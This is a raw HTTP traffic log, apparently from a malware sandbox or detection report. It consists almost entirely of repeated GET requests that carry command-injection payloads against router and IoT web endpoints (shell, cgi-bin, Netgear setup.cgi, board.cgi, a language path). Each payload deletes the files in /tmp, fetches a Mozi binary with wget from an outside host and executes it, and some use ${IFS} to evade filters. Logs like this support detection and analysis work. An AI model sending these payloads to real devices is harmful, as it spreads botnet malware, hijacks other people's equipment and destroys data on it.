                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 125.138.41.164:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.183.15.240:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 38.61.43.59:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 217.149.6.59:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 29.92.227.30:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 175.33.232.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 131.224.165.201:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 207.208.138.25:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 43.51.149.142:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 48.37.127.242:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 84.44.230.193:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 168.11.66.49:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 102.75.189.134:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 195.103.106.246:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 17.113.247.169:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 121.37.63.175:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 161.243.235.240:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 27.220.140.158:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 172.27.14.53:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 37.106.97.86:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 81.152.153.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
